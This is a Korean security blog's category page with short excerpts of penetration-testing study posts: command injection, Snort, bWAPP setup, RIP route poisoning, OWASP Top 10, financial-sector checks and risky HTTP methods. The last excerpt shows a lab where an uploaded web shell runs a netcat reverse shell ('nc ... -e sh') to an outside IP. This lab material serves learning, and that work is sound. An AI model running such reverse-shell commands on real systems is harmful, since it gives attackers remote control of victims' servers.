모의해킹 및 보안

모의해킹 및 보안

Commend Injection

명령어를 주입 대상 : 웹(HTTP) --> 80번 포트 --> apache deamon --> PHP/PHP-FPM사용 가능한 코드 : apache --> HTML, Script / PHP --> php server/client side code종류는 환경에 따라 바뀔 수 있음. Injection을 위해서 기본적으로 동작되는 환경을 파악할 필요가 있음. Injection 과정1. 명령어의 기본적인 동작을 확인--> 이를 활용하여 고정된 명령어(입력값)을 확인 2. 확인한 값을 이용하여 Injection이 가능한지 확인불가능 할 경우 이를 우회할 방법 탐색(Filtering 우회, Length 제한 우회 등) 3. Injection을 통해 임의의 동작을 실행.  DVWA Commend Injection ..

모의해킹 및 보안

snort2

오픈소스기반 IDPS(IDS+IPS)시그니처 기반 탐지 시스템 IDS(Intrusion Detection System) : 침입 탐지시스템- NIDS : IP주소를 소유하지 않음 -> 외부 접근불가    네트워크 전반 감시가 가능    자원손실 및 데이터 변조 x    침해 공격 결과를 알수 없음    암호화된 내용 검사 불가- HIDS : 운영체제에 부가적으로 설치    접근및 작업의 기록/추적가능    내부공격 탐지 유리    전체 네트워크 탐지 불가    공격대상일때만 탐지 가능 -주요기능    1. 데이터수집    2. 데이터 필터링    3. 침입탐지 : 오용/이상 탐지    4. 추적 및 대응 오탐 : False Positive미탐 : False Negative IPS (Intrusion Pr..

모의해킹 및 보안

bWAPP Redhat(CentOS/Rocky) Linux에 설치

php 버전 다운그래이드 remi release 설치 dnf install -y https://rpms.remirepo.net/enterprise/remi-release-9.rpm php 모듈 리셋dnf module reset php모듈 리스트 확인dnf module list phpremi8.0을 php기본 패키지로 설정dnf module enable php:remi-8.0 -y dnf module list php8.0에 enabled 된것을 확인  php, php-clil, php-common, php-mysql, mysql, mysqlserver설치dnf install -y php php-cli php-common php-mysql mysql mysqlserverphp --version8.0확인php..

모의해킹 및 보안

Longest match rule에 의한 라우팅 테이블 오염

longest match rule서브넷마스크가 더 긴 상세네트워크를 따라가게 됨  만약 위와같이 해커의 라우터(R5)의 네트워크 대역이 prifix 25로 더 길다.  R1의 라우팅 테이블을 보게 되면 10.1.2.0 경로가 두개인것을 확인 가능하다. 즉, 이 경우 longest match rule에 의해서 PC1으로 보내는 패킷은 PC2로 향하게 된다.   보는바와같이 pc1에서 ping을 보냈는데 pc2로 리플라이 패킷이 도착한것을 볼 수 있다.  이를 방지하기위해서 RIP 인증이 필요하다.다음과같이 R2와 R3에 keychain을 통한 인증을 걸어두었다.  그 결과 해커의 Router인 R5의 정보는 keychain이 등록된 인터페이스에서 등록이 되지 않는것을 볼 수 있다. 전송되는 패킷을 보면 다..

모의해킹 및 보안

OWASP TOP 10 ver.2021

OWASP TOP 10-2021- 개요OWASP(Open Web Application Security Project) Top 10은 웹 애플리케이션 보안의 중요한 취약점들을 정리한 리스트로, 웹 개발자, 보안 전문가, 그리고 IT 관리자가 알아야 할 주요 보안 문제들을 다룹니다. 이 목록은 OWASP에서 주기적으로 업데이트하며, 전 세계 보안 커뮤니티와 기업들의 협업을 통해 작성된다. 최신 버전(2021)의 OWASP Top 10을 기준으로 각 항목을 설명하면 다음과 같다: A01: Broken Access Control (취약한 접근 제어)사용자가 자신의 권한을 넘어서는 데이터를 열람하거나, 불법적인 기능을 수행할 수 있도록 허용하는 문제. 예를 들어, 인증되지 않은 사용자가 관리자 권한을 가지게 되는..

모의해킹 및 보안

[금취분평] 이용자 입력 정보 보호

전자금융. 이용자의 거래 입력 수단을 보호하기 위한 금융회사의 대응수단 및 적용범위 등을 점검 평가 예시 : 이용자의 거래정보 입력 보호 범위가 금웅회사가 정한 범위와 달리 적용되어 있거나 또는 일관성 확인. 이용자 거래정보 입력보호에 대응하기 위한 절차 또는 방법 존재 여부 점검. 이용자 입력정보 보호의 대표적 예시로 가상 키패드가 있다. 가상키패드는 마우스 클릭이나 화면 터치등으로 값을 입력하도록 한다. 가상키패드가 사용자 입력을 보호하는 원리는 다음과 같다. 키보드로 데이터를 입력 할 경우 이 입력값이 메모리에 저장되게 된다. 만약 피해자의 기기에 이러한 메모리값을 탈취하는 악성 코드가 심어져 있다고 가정해보자. 그렇다면 키보드로 입력한 값들이 전부 탈취되게 되는 것이다. 가상 키패드의 경우에는 버..

모의해킹 및 보안

[금취분평] 불필요한 웹 메서드 허용

웹 서버는 일반적으로 보안을 위하여 GET, POST, OPTIONS, HEAD 메서드만을 사용하는 경우가 많다. 하지만 웹 서버 설정에 따라 다른 메서드를 허용하는 경우가 있다. - PUT : 리소스를 서버에 업데이트 - DELETE : 리소스를 서버에서 삭제 위 두개의 메서드의 경우 웹 서버의 파일을 삽입, 삭제, 변조가 가능하다. 즉, 웹 서버의 서비스되는 페이지의 변조 뿐만이아니라 웹쉘 등과 같은 치명적인 악성 파일을 업로드 하는 것도 가능하다. 물론 이또한 설정을 통해 메서드는 허용되지만 위와같은 작업은 차단하는 경우도 있다. 다만 PUT과 DELETE 메서드를 허용하는 경우 이에 대한 점검은 해봐야 한다. PUT과 DELETE보다 생소한 메서드인 TRACE에서도 취약점이 존재한다. - TRAC..

모의해킹 및 보안

Iq Spoofing 웹사이트 Post-Exploit

파일 업로드 취약점으로 사이트에 웹 쉘을 업로드 시켰다. 정상 작동을 하며 현제 사용자 id는 www-data 즉, 웹서버임을 확인 할 수 있다. Post-Exploit으로 주로 사용하는 시나리오는 소스코드 다운로드 혹은, 리버스 쉘 삽입이다. 따라서 웹 쉘을 이용해서 리버스 쉘 삽입을 해보도록 하겠다. 우선 리버스쉘의 동작 원리부터 설명하겠다. 리버스 쉘은 바인드 쉘과 반대로 공격자가 포트를 열어놓으면 피해자 서버에서 요청을 보내 통신을 하도록 한다. 공격자는 포트를 열고 접속을 기다렸다. nc -lvnp 1212 그리고 웹 쉘을 통해 피공격자 서버에 다음 명령을 실행시켰다. nc 110.9.135.75 1212 -e sh 이는 netcat을 이용해 공격자 서버의 1212포트로 접속하도록 하며 sh(쉘..

잉여토끼
'모의해킹 및 보안' 카테고리의 글 목록 (4 Page)